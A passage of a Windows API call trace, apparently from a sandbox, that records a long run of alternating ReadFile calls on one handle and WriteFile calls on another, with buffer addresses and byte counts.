hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.648] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xcc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.648] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.649] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.650] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x205, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.650] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.651] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.651] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.652] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.652] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.653] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.653] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.654] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.654] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.655] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.655] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.656] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.656] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.657] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.657] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.658] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.658] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.659] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.659] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.660] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.660] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.661] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.662] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.662] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.663] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.663] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.664] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.664] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.665] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.665] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.666] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.666] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.667] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.667] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.668] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.669] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.669] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.670] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.670] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.671] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.671] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.672] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.672] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.673] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.673] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.674] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.674] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x399, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.675] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.675] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.676] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.676] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.677] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.677] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.678] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.678] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.679] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.680] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.680] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.681] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.681] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.682] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.682] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.683] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.683] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.685] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.685] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x67, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.686] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.688] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.688] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.689] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.689] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.691] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.691] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.692] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x178, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.692] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.694] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.694] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.695] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.697] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xaa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.698] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x395, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.699] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, 